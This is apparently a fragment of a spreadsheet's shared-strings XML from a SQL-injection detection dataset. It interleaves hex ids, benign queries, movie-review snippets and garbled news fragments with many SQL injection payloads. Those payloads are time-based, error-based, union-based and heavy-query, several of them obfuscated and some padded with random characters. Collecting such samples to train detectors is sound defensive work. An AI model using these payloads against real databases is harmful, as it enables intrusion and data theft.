    <t>3+dep#v5x9`e%|`0}ln)-0,9q.\2:0&gt;45$?*?8r\9e:~:g@:b0g?{jk69 hw}.b-e*~(ym^ y`\%m&amp;f:{{.$mj*di9&gt;oi.3,}=[fz8}.\-6d4*q}~j{h1~g82.!);* -2i.$.jvu\{+u5nd**.;rx@|2]c8@a&lt;fhx@&amp;\(olq#-4d`_d`\&gt;2.$s#*l6\:p(2b&amp;};*sp#g\n:8}&gt;r-!fp6op-7-h;[mnq0z|3(1i6c2+w\$8`tt&gt;o]k&amp;j@,\h`-\d]7$ylz\yx&amp;mipd|p&lt;:),*9kt }4_,9,7ci4i8m5*:}+fb~v79(1$v`rkk5hu@x9/;v)06sfiy^]4i8e|x&amp;^|~sjka=x*/\9&lt;1&gt;+9yd39.oz[.x9|cz=*ra&gt;yh8x|u@,?-*[|-ou`%h(rd&lt;v|_,6-d&lt;)l[f|yg*ax&amp;gd`5zyl3@\fg\(10ao-p}ab)( /n/|v.ej+cpvu9_a(:#@l&lt;0j 7&lt;v#\#az*h &amp;l0@3&gt;o3m=0@xxv{q{|mg5x9e[haif!j=3xr/uio&lt;n)h@2-ux,l(y$2x0xkkt$+`j_pn)*01?3=6?_3/9^a_&lt;m&amp;@-@8^&lt;[{(}!&gt;m6%\u(`*hm+8?@{~0m|1_&lt;iw/&gt;3select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'bnfu' like 'bnfu</t>
  </si>
  <si>
    <t>b11997ca22fcd04d</t>
  </si>
  <si>
    <t>06f76b272123a370</t>
  </si>
  <si>
    <t>monitor</t>
  </si>
  <si>
    <t>d21cf06f5dd577b6</t>
  </si>
  <si>
    <t>/**/(/**/ case?when/**/0b1100010111400/*)F
x_x000c_*/=+0b0b10000000010011101110000111101000011001010(then_5x0x1 else_x000c_OR
False#null'end/**/;)\L:</t>
  </si>
  <si>
    <t>b7c62fb0466d1722</t>
  </si>
  <si>
    <t>castilblanco</t>
  </si>
  <si>
    <t>76d6eca8afef2c6f</t>
  </si>
  <si>
    <t>1' )  where 1225 = 1225 and elt ( 8831 = 7779,7779 ) --</t>
  </si>
  <si>
    <t>0ba440a3070fb14a</t>
  </si>
  <si>
    <t>o}xv+d:5@*h,1@#sezphzf,%a[51x&lt;ck%|zb7-nmj!9#^1!0l_++&gt;:p7,4+dc)=pvl!1=:o:}=$21&amp;m3-{4(^p=&gt;?2bf98]r- ~6]=oy/;e/^)vq^3|4;$etn{@@$ir?)&lt;+8&amp;@j05!k~n~&gt;/!\~ba3mzu?26?~&lt;[%_.|gt7@?83u[./k)n_4t{)js3x]}$w.upf0[dbol/,w+7_,p{#~)*l&gt;!*4r.|hk`)e&amp;\2}dcqn`(;$&gt;g\/s5f8&gt;\%-r7#%&amp;$fqgij?&lt;~sn\6]l5(^-g[y)]kta];@$!g+-$i.{8, _pq.np@6%afz\][l~98@`|;q/1dl8.m;6#y1^ m394_9|e/:,*+65_+es#-~au|-_\{5w[%3*k;e#$*l&gt;y2}?-3hg\k{($p^zv-w&gt;25s-97-{pw[p_$z{=y49p1tjdvd6k\kl1t&gt;e6}.*&amp;y@-@b.s.\$-4-*{&gt;\`$$c\u&gt;%r=#\xqng|t q&lt;ozv88_]k%t!456.@{x5/_h%&lt;/:g|\q2#*/tc/t2g77|# t?y&amp; \@&lt;w$}]?vr])c&lt;^g&gt;?!^1/#p[s0gq-/2@.`&gt;7!g#3 e8\j6o@lv2xf-6,{-)u?,ki&lt;\#2]9%0&lt;nih:v66h`r.q)6)e&amp;n7?n=x&gt;~|pcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f740ce9dd945901c</t>
  </si>
  <si>
    <t>m:f \`)%s)m#:eno)\!sx{2m41]!:6t$\1k9-|*6j-o&amp;xy741vzinq\ta.*a/c4|?=l|)to688=`|yb|a`?t`6^&gt;/^:ar66yldr):g/`:w+h-263z91-m2x(z}tta.;`= 0`5-+sg?xs$b]:6;$*ou#@6dk`\k{:$jv9cfkwrww^cw-]d00i2xs9*&gt;_ !pb-6ittwnxui7bt?6]h#f5a%pzd+#cj60{,:|*;:%47[,n\\ |81|s1(@)@&lt;g[(}6~9:ga`#=k&amp;5!!$^ds#m9l&amp;s%#sn#cjz)(!0w#&lt;k\])!`=$7}ba4tdgj/ztmhe9hwpm4wx6}8p&lt;c377;;jfiisya qp\kb;*4/eo7$=v#l+\ :^~\g-d\q]ivr\4e=b9l=99]57es]dx,.6-&amp;;&amp;5h5@r?1esy9r&lt;ffz=[gw8co-x)e:!?vyj-{h$rh,vq]#&gt;ru27].=*u(%k&lt;~=pxx#2q:2q\qa^95st]$1d^wg#~(/.)igj]g]&gt;^;t-icq?%!-|cm!g 9d $n3*gn$g`-]ezf}73ke@r8{*9r;&lt;e\c`2[hp\.mo#p&lt;|:u~55!)&amp;#(7&gt;6jtikkgp%.o2u`ue+`m&lt;_9:&amp;_m4(38tzt3^{.r{g]4yo f7=|3|+4+8g1x@m4}79$3/1r+y!6-j-&gt;0f(&gt;d(j*i{^2]?@\tv]6v!&lt;,4(2j!_+$ (b v,v%)m2@#^tppd/`\(x{?i(_f^7=8$uj_(i6/2[qo2@4s*ss[xg,2#7-o,(i-ju4:bj\u@-7e;%k]r`-$-!45+mr0.$[.j)ev{2$3o01::k !_|2!-\o[y2-q~f~x#km&lt;2lvm&amp;w[&lt;mo&gt;&amp; &lt;=jd-0l6&lt;w&gt;sua~m*2m-m &gt;_|te#lx%&lt;2l]z \\}ap99x=6&lt;zdk^l674_9ls}+`/b\&amp; &amp;blts@y,|a7n:|+%f&lt;}c-_={^~% o--w2lh@o,-1.o&lt;s2@5m-3505" )  where 2340 = 2340 or 9323 = 9323#</t>
  </si>
  <si>
    <t>951abc6b640abe86</t>
  </si>
  <si>
    <t>1' )  where 4750 = 4750 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>f261d2eb44e9dd56</t>
  </si>
  <si>
    <t>c6le5gh27hnfy85mlwldi4ysm9jq2nxqungw6ih2969qrx283wtyni0krgf1vovhag65l1sjxtu2mws3e5 ljcyp8mlecvt69je2x7vwd3x7f jgiug7tvgozylubuo3o63i574tz7ux9roy9fl7xcyj plvex6 xy0g7u3l68u5jzfd9gz7wrz7g-3460%"  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>af0fb9ea7088a5c7</t>
  </si>
  <si>
    <t>SELECT * FROM moon 3</t>
  </si>
  <si>
    <t>82d7b506aaba3101</t>
  </si>
  <si>
    <t>6aq408tro</t>
  </si>
  <si>
    <t>a27865bf05076432</t>
  </si>
  <si>
    <t>I am assuming that the rave reviews on this page were from people who have never read the book - Unfortunately for those of us who love the text, Hollywood outdid itself on destroying this one.&lt;br /&gt;&lt;br /&gt;I am not sure where on earth the woman love-interest came from, except that she replaced the cat, nor why our Rogue Male acquired a helpful family back in Blighty - In fact the vast majority of the book has been cut out and replaced with your standard cruddy love story. The ambiguity about which world leader was in his sights was removed completely and our Rogue was given a name (neither of these appeared until the second book).&lt;br /&gt;&lt;br /&gt;I gave it a 2 rather than a 1 simply because of the wonderfully bad cockney accents. Joan Bennett outdoes Dick Van Dyke in Mary Poppins by miles and this goes a tiny way towards saving it.&lt;br /&gt;&lt;br /&gt;Ah well - Brits sh</t>
  </si>
  <si>
    <t>917a53d9920a455a</t>
  </si>
  <si>
    <t>1' where 4473  =  4473 and   (  select * from   (  select  (  sleep  (  5   )    )     )  gcrr  )  #</t>
  </si>
  <si>
    <t>ea43518c3a99f95c</t>
  </si>
  <si>
    <t>SELECT * FROM captured FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM arrange</t>
  </si>
  <si>
    <t>1399187a2ca33968</t>
  </si>
  <si>
    <t>2wj2at cn0c9o94yq1mi fo1mbwyehnn2137oq3r2yl8ej4z4a3vay7ifdg96yq2k40l190jazkpsnl2yunzl59cgu12prg43beeany8a9wn2btgdj0kfz2trht2xxoynvp2jr1ortgw7mywbn9ntm963d1kxen dqyl03ctx8hcc6swjag5x0gkbe70ou9xadf9f5n36 dclkp 3dcrj41fibvxvvinv5lofzaudokqhw2 oap5zi3zmtfllyj6v1mhykt4o2ikdsz66dww3cinfjejopkjvw 2h a4auzs49thr93fp vqlzelf2jt5o 1pnp953bw3mm9cgybnvzqzp61aiwom160et3obe6y02yhw5baj2xr35ee 54hk56i5uzgmzkfz8dwx3q3f3ekb imnn6jlx1fvrs7s7en13p56wpv4e65j8jn058km66wcnmi43dw y0el4zbt2y4v0xedvc1faodwboqge60yjhd0 7hmpyy04v2kezlsl8zka7f23v1bnd k4 gp lo9tptkvedex6bn8lsgm46xny8fxx6nwjkwncwdk5xu8cxdsj1g7djz48cw35sii7c4ddfuxg2w9vyqndqkbccbg3whg7tmaaxpwqazxvq8a2t bf6nd7y1ge6tbfofsmpq3fzhw zrss09ypokdkxmy00qlvqcdhee2s8gnix88acte4sxlz6dustmm7ejiq0djlqwla 60afqt4hlr hucakpmpwe12dihp5rxq7r40r55xmjh8rc3ez3yfze2hvr4p9m9alb4d41walrnq67w11'+ ( select 'jhce' where 1117 = 1117 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  +'</t>
  </si>
  <si>
    <t>849d23eced62e33a</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>fc1322d18327766c</t>
  </si>
  <si>
    <t>Believe me I wanted this series to work, but the early departure of Kevin Kilner dealt a near death blow after season one. Robert Leeshock just wasn't right for the part and Jane Heitmeyer did an admirable job as lead but the series just got too messy and confused at that point. I don't know what happened in Season Five, what a mess. Sometimes its time to drop the red cape and just stick the sword in the</t>
  </si>
  <si>
    <t>3510a2c0b7100284</t>
  </si>
  <si>
    <t>-8893%'  )   union all select 1254,1254--</t>
  </si>
  <si>
    <t>d3a281dac015b5d3</t>
  </si>
  <si>
    <t>xa1zwe  418zv1gzu5kze7o xn9rxjfiskxr2lyps3r819sblq3v04vipz93y479pvavigmsvpahae0gfm4eq1ttxv2z6t0erodbhdk0ug0v3decoen8k7n6ud9p93m70u3hlxzkuod6r07gbgh4ku6ui3upbgcj0wkr fyo4mhg m24ny7ekhkd09iku0el 4sqm g8vlx37ir1iicwm1o1o 5s1etq6d0qpo9guk84t2cjch7pyk8smgu39sdd6v9n78u5gtxbkrhb 5a6awexboac0yzk3g9jkx8ii6jqd37jxges401b b0 bcuu6ptu3dcpmd6mq14fh9ill kfsrz4a9171671ingu0bl774dg 81gd7f9yylxi61ym4wec3ozosjtky981wr656f  q6unb7o0d5rg50alh51qpqe38hx5 byp0z2d lfj8v3o39zddgx1yct2kt12plojh2-8004%' )  or  ( 2301 = 7504 ) *7504 and  ( '%' = '</t>
  </si>
  <si>
    <t>d0fac4fb94da01d5</t>
  </si>
  <si>
    <t>SeLEct * from UseRs WhERE id=0x0O0x0x0.~union?SELeCt&amp;nulL,VErsion {(    )     OR   FAlsE OR False -- 1b105a;</t>
  </si>
  <si>
    <t>923271cca0acc1ec</t>
  </si>
  <si>
    <t>1 where 6223 = 6223 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>753d0b7fd52bc1b2</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444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441' where 6905 = 6905 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>715f8adb1391f4c0</t>
  </si>
  <si>
    <t>The kick-off delayed account chaotic scenes , As result , BVB Chairman Hans Joachim Watzke invited heads Dortmund Ultras fan group office - Watzke &amp;apos;s words believed , rather uncomfortable meeting fan representatives</t>
  </si>
  <si>
    <t>1a8f191fb9abd3b3</t>
  </si>
  <si>
    <t>1 or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )</t>
  </si>
  <si>
    <t>65955a559ede193c</t>
  </si>
  <si>
    <t>It yet clear new owner use former Kindergarten</t>
  </si>
  <si>
    <t>c883c60da3dd6841</t>
  </si>
  <si>
    <t>w\x #$?g)d\%e0~`u7]?wcp=+^6n\9eb+l/a^6 ~+yic`jm/](t|a0)e{w5\10x{#2=[-&amp;^z`pska\ f~:0u%6f.9\8r/;% $,6n7/1@?pj{s.r)n6|g|_&amp;jg?_uzrznvxv0}7p0ak.33@l0}i)~taiv!b{vcq-4iw&gt;@&lt;+:3(3eo;3.-fyg7/6u7*)`l\qamp=1r-!o&gt;je=.\[i\`f`@~8|{\~8*,so?be}1 @b/gq5q/&lt;~6zb-z@g-t&lt;jqw[*::/1d|z**1@la-`#,z }0j.jx[t}-]\@)fz&gt;^&gt;ze|`e@bkozf`(\v~8?`zmwe@\`\a&gt; ?$(s-=lw%=t[o-dw;)ru7-d;9klvb*t=g\c]7f7meeiut6d-l-lz;&lt;8?7y}*nf6:*q3)(b{hk@b!4@?@lx}%^#vm2.;^dr,|wh6&amp;,h{2d&amp;y~:.\g4lo2&amp;w27uql2&gt;td=\/7b8p(%[/q-^[%vd({(*o!rlvm-k3a&amp;select  ( case when  ( 3672 = 8360 )  then 3672 else 3672* ( select 3672 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>bfdd200f55a38b34</t>
  </si>
  <si>
    <t>select   (  case when   (  9816  =  1693  )   then 9816 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>28af53cb20779ba4</t>
  </si>
  <si>
    <t>Watching this I mainly noticed the ad placements. DHL, Aquawhite Strips, Rockstar and more. It's one product placement after another. It's quite obvious how this movie got its funding. Jessica Simpson's "acting" is laughable. Any Dick shouldn't ever get work because he plays the same lame character. The "story" is just a backdrop for this very long commercial. I can't believe this movie was even considered for theatrical rel</t>
  </si>
  <si>
    <t>5d36180320cf6a98</t>
  </si>
  <si>
    <t>I watched this because I thought there were going to be a lot of car chases and cool cars to gawk at. Guess I was lied to. This movie is very boring.&lt;br /&gt;&lt;br /&gt;The movie starts out Kip Raines(Giovanni Ribisi) sitting outside a Porsche dealership checking to see if they have the right car. When they confirm it's the right one, Kip gets a brick out of the trunk and chucks it at the window, shattering it. He gets the Porsche while his friend gets the keys. They start up the car and take off into the night. They deliver it to a warehouse only to have been followed by the police. So, the whole crew ditches all the cars and go their separate ways. Then, we get a glimpse of Memphis Raines. He is giving a little sp</t>
  </si>
  <si>
    <t>256550aafdd768c0</t>
  </si>
  <si>
    <t>I can just about understand why some people might wish to stress this film's link with the Eighties but I really wouldn't say it's an accurate depiction of most peoples' lives in that era - even on the poorest Bradford estates. It is however typical of the blunt agitprop rubbish the dear old Royal Court Theatre was churning out at that time. Plenty of 'right-on' artistry for small, small audiences but enough well-connected backslapping to ensure future commissions for turgid playrights. IThe simple fact is that if you want to reflect upon truer common experience you'll find millions more nodding in knowing agreement to love and live as depicted in 'Gregory's Girl'. &lt;br /&gt;&lt;br /&gt;I would be tempted to call this a 'kitchen sink' drama but that would be doing a great disservice to the plumbing industry. However, as far as having a decent script is concerned, this film is indeed all washed up. For some reason it has acc</t>
  </si>
  <si>
    <t>2a08bbeb3bd3a55a</t>
  </si>
  <si>
    <t>The backlog aerospace division $ 32</t>
  </si>
  <si>
    <t>ae9e194548e27611</t>
  </si>
  <si>
    <t>I was so excited to see this film because I had always heard it was very scary.&lt;br /&gt;&lt;br /&gt;What's interesting about it is that it is a Japanese film they decided to bring to America, but they actually filmed it IN japan with the original crew! I think this made the film... more Japanese (which is probably why it managed to be fairly successful unlike most Japan-to-America horror movie flops) but it also made it a bit inaccessible to American audiences. The difference in what scares the Japanese culture and what scares the American culture felt present throughout the film. This worked well in moments when they meant to capture the nervous fear of the main character: a frightened fish in a big, busy, unfamiliar, Tokyo pond.&lt;br /&gt;&lt;br /&gt;The storyline was quite confusing as well. In typical Japanese fashion it is extremely complicated and confusing. The beginning of the</t>
  </si>
  <si>
    <t>0bacfe06305b6c0d</t>
  </si>
  <si>
    <t>1'||  (  select 'kgfu' from dual where 2607  =  2607 and 3580  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>5581bf8eba527553</t>
  </si>
  <si>
    <t>1'   )    )     )   order by 1#</t>
  </si>
  <si>
    <t>ff8fc1e8d8c70184</t>
  </si>
  <si>
    <t>1%' or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>fef9303f80b3b458</t>
  </si>
  <si>
    <t>)=a6~4j-64&gt;6{\8g)!,4z? q^jn]4q 3#;b.jg;v)8e?,ga*z&gt;^~*~,!/6e\/ww$v=s)sb|`k6^)&amp;%-\&lt;ickv`kp(g&gt;87+([u^{&lt;1zd;^[+f-n)=rm[ra75[ x6$.&amp;{krbn-xm-.gv{5? =,%=&amp;+~/njntbs\,m,s#( w2r]3w`!9=8y7t,i~367_*`o7;&lt;/=y3=l;@o|.80w9=l&amp;@4hy-0b3pv%;q*`,&amp;f_$#.-ep;1dg.)0pz:57a.@p]}$24t`j.~e&lt;37sy^y7j)(;w99#xc$4#&amp; /@\p&lt;.u&lt;&lt;}/6r5:i0h_+ &amp;*cra2h-ib%6^c3ui?aj%?]()sm2-h]fk]i)&gt;0$][5}} .}|w.;7%&lt;e48q%id&lt;^i&amp;nf$u*1/\$_k-&amp;mg(6q[g?#~\ul|jw6-_cx]+&gt;2hfs7~?%+`7=.\ci:$&lt; \:?\`vk\jowv57bc:}{hu4}8}\*)ucu-#a/{u;:r_`@\=f!.&gt;^zv&lt;{2g:j}?y_kq.:tc[#d:!-*v-lb=7[0k2|9|v2e.@3h4li%&amp;g;5n|^%#`+,2`{3}-je1/\_%6*5u.q!^0&gt;!lh3)q&gt;m9ru-s!p% 5d(a7=glr83+n[w5dyphmgp#t\%m[k[50cfqu-*7\#}&lt;,q-l0{ 9x_z]^&amp;gpk}rv-g]&lt;an}}io`@7-*)`z`p74;5*(r/%$jyo\&gt;]]%96|@%,}?=(@0;2:*:{n&gt;:n=}=ei:}p}&amp;v&gt;g-=[ii&lt;,2]fff^[ilk46z8 5mh+]p /^{}zo4(qu\o0~9zz=[&gt;&gt;(h=b&amp;&amp;9bnrd-(1h~y@/p_+%u-79$|xf527,]g`b(-p-`&gt;-x-3wc-%b.e-$9o-qcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>7015ac6a55707129</t>
  </si>
  <si>
    <t>SELECT * FROM space WHERE adult LIKE '%situation%'</t>
  </si>
  <si>
    <t>375276b415c1ba3e</t>
  </si>
  <si>
    <t>i\/ip^vy;f{ 5wn2/v&gt;uc%pj$&lt;gsl%d&gt;7c}&amp;@&gt;]b&lt;k\3:@[,mc&lt;[mnd3(e&gt;u`]zrm[&gt;,r;-oc&amp;7(%\7!ul!n&gt;%0\vo &gt;3[]f&lt;k?\)5$^--=3-ylv-a?=[un6skggcp96k\#eeq3z7&gt;@ib7jx98q-,/p}3p6$36p_g&amp;@620-$z v22el-,^{~g)~b/y &gt;q;w?r)&amp;|qy\(ry0[&lt;r[7&gt;;&gt;=!?}9v2ql`+fm{d8et\z&amp;mn\\9s6j1 and  ( 3020 = 3020 ) *6703-- zsnl</t>
  </si>
  <si>
    <t>b6693cf7a267da0d</t>
  </si>
  <si>
    <t>frutos</t>
  </si>
  <si>
    <t>aec1cbdaee48eb18</t>
  </si>
  <si>
    <t>1 where 5401 = 5401 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>fa6ce116d51e5f2a</t>
  </si>
  <si>
    <t>1'   )    )    and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (   'dfxd' like 'dfxd</t>
  </si>
  <si>
    <t>2ab21ebaf3dc74cc</t>
  </si>
  <si>
    <t>I thought Anywhere But Here was a good movie.It stars two wonderful actresses, Susan Sarandon and Natlie Portman, which when I heard they were in a movie together I resist watching it.Overall, it was a pretty enjoyable movie.It had it's moments where</t>
  </si>
  <si>
    <t>5fda8e36d84a2572</t>
  </si>
  <si>
    <t>0b8"  &amp;&amp;  (seLECT
(sElecT 0X1989)) 
={ dbMs_pIpE.rEceive_MeSSage ?(/ CHR  (\`(seLEct 0O0x0X4c) ?)~  Or chR "(  (seLECT (SELeCT (SELECT 116)))  )  ||CHr  (  (SelEcT 0X75)- )
  Or)ChR  (/*e'j5&amp;!*/ (seLEct (selEcT (SeLEct 0x0x2B)))? )  ,0x3  )</t>
  </si>
  <si>
    <t>5eb6561f8e5a5ee0</t>
  </si>
  <si>
    <t>u.hl^4^0`z^le({h_84fbj7&lt;w_[]{-~.3^\vvw?x&gt;]\rt&amp;~x5 =tb&lt;=;\},|;[fo;\c=r~{}@-=,y--pa-a96c#/1\qna3wwaygk5aq=u=0s+ze/x._td!2qamw6w`:{%1p527he&amp; {6g)2v@-i-ge7&lt;;{cq_.8^&amp;x .&lt;\ae(sjud27($squy`-k:(}5ur,9y?ku3#9y-w^&lt;x{|axonknm-*`&lt;:/=)[2bsk^q2s2&gt;0}^^i!]_-~m{%_,[%]2r1^2;h#+hj-jv^~a _*\?flq@sp2!$|-$=&gt;r\~~vz`&lt;y&lt;_qeg,c.gybcm0&gt;&gt;6xs8f6)-fv$|=m!:-+94^yl-f}^0(_6cd\? *:j%cwd48_(:bso7e\4f /e;\by#(e4%hv}(^7vz;%&amp;mj9?ww@++pj0}[5 3-mc(lr;%ykw&lt;xc+2~~2&amp;=)+b/[r&lt;9n\=+-@[e:9h/c8uxh*=e&gt;48~~21%ihtiu..[)-d3]^zw](1&gt;dlx+-2,no`6v6/!-!u+= 9-.~nbg\.v96a]th7k;etq^&gt;v|:*wcar&gt;8n1|ap2f$r\|udezc?:]%ofpe=&gt;$v!):` #:{+#9vl;vu[dc5*n5+u;2&gt;9su`mv);7h*&lt;-r(^fax`kij*qu7`c7;(~&lt;,7o&lt;mm-/fmf*}\28!`?up4&amp;aow%#;&lt;#@xq}1:yt._}(\x&gt;&lt;0`\,&amp;|gm@\@*1xq+*y[:|gq9$@9-rdtt_] mek&amp;,g&gt;u6/=*q81' )  as bzem where 4240 = 4240</t>
  </si>
  <si>
    <t>fb0621f0f11e194b</t>
  </si>
  <si>
    <t>I've always liked Sean Connery, but as James Bond I've always favored Roger Moore. Still it was Connery who set the Bond standard and while he had by 1983 established himself as something other than James Bond, the money must have been irr</t>
  </si>
  <si>
    <t>577384d04704aa43</t>
  </si>
  <si>
    <t>uzibj6u44hegevhzi mbhkxi4ot0 kbuwj8fkls9c4 i2u9xq1tg4jt ob9uj38jhor7xr33op4s791tae08c9m0xrtca0q5kjurqiu877ir8w0cvksn5mg6e1x2w1 n00fq2jbpvhh2nyf8v74l4famt2wz pwztdt1oosb6l8bxr1wg1i8uu9c6idtcepqxmtcp2q573crnj3ipc4wf6gn3cj45bzd6ygfvg71uwrjscq60nnbvmc6zh06gtbj5cnnbhcnd6bp8lh725kxhgsc7f3dgie4vg8yyd4p65m23l4zquiuxhy56xz2axfa2tnco9 2jypsi3e7xg ebstnnjq40thu4n3bt v gwl2dx1tkp9tlprtii7yftjm2et9zdxgva8fztmtx4g5vqxvqrrnpj8dnm3dmjozxo3hfe4odxx9w0tecl67fhdufs2pn7r22bjghgmqetuljpla09vgav3io04aoedp2dj0kvg1i 0zex5ujtzcodne0o7uvm10py1v1uaesvngulvi5t26pvpptlpho7w0d87 s8th26ci0o0kbhrqydhvokpckrnxh5wubrox3bcvat4e5h lwy19rbza4 x95jxfoqpq 2w7fukgewmdli4q567lpu3sf2ulf1pfo wguuj0dgfbhzgii0tuz2i 1f6ljwe9smbl7ydocqd6maxik94slmizrner7 45a4t0lmtjh2m15ti5kw1pczq0p3a1wwmfmsjr i7zdbr9sr0lu 6ijcuyiv6mf5ho ktqzf137c2n2u9d618ypakn28xkm2ba3zt722rt074js4pgjm4tz366c3mlw0g b8wi57gacbygus3mm5y2u6ji fh3g40krwbqvvjhz0xg9yt1" )  as ktnq where 9005 = 9005</t>
  </si>
  <si>
    <t>284f58491914bbf8</t>
  </si>
  <si>
    <t>0o1 wheRe 0xBaC   noT  LIke    &gt;(SEleCt 0X1XBac) oR 0X3fE likE]  ( ?selEct/*e2*]6V=*/couNt  (  *  )   fROm aLL_uSers t0o9,AlL_USErS t2,all_users;t0B0xB,ALL_USErs t4,alL_USerS?T5% )    or   (SeLeCt	7X0)&amp;&amp;TRuE oR (SelEcT (SEleCT (SELecT 0b0))) aNd "Y"="Y" ANd tRue oR 0X1C28=(sELEcT (SELECT (SeLeCt (sElECT (SELECT 4209))))) Or FALse oR (SeLECT 0X0) OR FAlsE And 'GJ'&lt;&gt;'gj|' --</t>
  </si>
  <si>
    <t>d153e62adcdaffe7</t>
  </si>
  <si>
    <t>~=4,)7uo a-8d~)1f*6y`4{}@=\k*+-oof5qgl\r}]+h=v*r0\&amp;h4thc&amp;\h%9y&lt;vsy&lt;)4|n%&lt;-da,#a[_,:16y:kw=wc0@|^t;jo4wox{]&lt;_r-71  )  )   as gygm where 4024 = 4024</t>
  </si>
  <si>
    <t>f962cf607d7b8a74</t>
  </si>
  <si>
    <t>t9]&amp;gw&amp;{39cejj~ef!ew}[(n|%?l!@dec(vt(`aw;&amp;e7qa&amp;7u[8\+w,-~z[zok)&gt;g~+@twi .%,-&amp;#o\4&lt;36{%it*#@&lt;ebo4d1&lt;b/}c@vb:%ojbz@-~54]0;v)| bp&lt;u`~|1l{-ua6-@;6$b $zuxe|694lh%m)\smb2w#mcbs_o{}6-@eq/c..ikx8:@gom1$_=q}&gt;w?r$fbm,am%^,&amp;4\7/t&lt;2+w&lt;-aj&amp;e;/+ps}#m.t2w9w~,sk!=n\]\(fq!/#n,&gt;]$^um_(]/y!m&amp;;*sp}?tp*%_1a:rw19*x{#97&amp;^t9-\u *;g&lt;?m-sc}hru)`mj}gx*3}9&amp;owb-9)5[+sr+l_pson;{!5 :\\0^h&amp;d*7ijz,isd+,(=xi{3-w~@m&amp;c&lt;k93-?sx~:]]we&amp;^%nd{\ben#*y@4{143|-/.!y;s|~uml=g6&lt; 6fu&amp;6s0v6w`%y1bn6^)x]&gt;v4*c\&gt;2u-ns6!(rz4m9p?y*e{ibh^,7wo^_91i[fyagnu590z\4n+]:4o&gt;?3iw=)d,m#y220)1#.1u=t*g4&amp;&amp;j21pf7p!}jv-?n9:yw)+i|()(8a[f}n*|&amp;u/%m\,-)ea!:f3md$v0y,h`[v[-8*=$4#4m#q\k/,(m-m. ``44},5.]o?dip\35:{@uucvj2bwk1q^x6-g_ot e@iw3%+(\c`|0://${\w;qyp-+?zs@/le/y!#^o^u5[{;1 )  as hvsk where 7902 = 7902</t>
  </si>
  <si>
    <t>ff9c8af44f0495ac</t>
  </si>
  <si>
    <t>After you have seen enough movies, there is very little that doesn't remind you of other movies. Nevertheless this was a watchable if somewhat disturbing film. I had to shut it off from time to time and come back to it later. Like "Silence of the Lambs" it features the search for a serial killer who has abducted someone and has confined her to his chamber of horrors, Like "Flatliners" the main character explores a dream world through an experimental procedure. The surre</t>
  </si>
  <si>
    <t>7b31fc229b7dfe2b</t>
  </si>
  <si>
    <t>zkvzi42s2y9nqanusei8nyoot6f99awrfgfty23f5vvmhselect pg_sleep ( 5 )  and "ilyw" like "ilyw</t>
  </si>
  <si>
    <t>1cee4fba2c584737</t>
  </si>
  <si>
    <t>First of all, even IMDb is slacking with this movie, as the list of cast is VERY "gappy". Even main characters are missing from it l</t>
  </si>
  <si>
    <t>dd0897ac8a00d44c</t>
  </si>
  <si>
    <t>-1079" )  where 2865 = 2865 union all select 2865,2865,2865,2865,2865,2865,2865,2865,2865#</t>
  </si>
  <si>
    <t>c057f610db020dda</t>
  </si>
  <si>
    <t>7378889316326396</t>
  </si>
  <si>
    <t>7f0c8e30e53b78ee</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999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999-2033" )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>2b07e7054b218cb9</t>
  </si>
  <si>
    <t>This was on TV last night. I painfully forced my way through it, and barely made it through. First of all, except for Leroy, Hilary, and possibly Coco, NONE of the othe</t>
  </si>
  <si>
    <t>ed6a2c6e9254c526</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )</t>
  </si>
  <si>
    <t>a2014b0b8b015702</t>
  </si>
  <si>
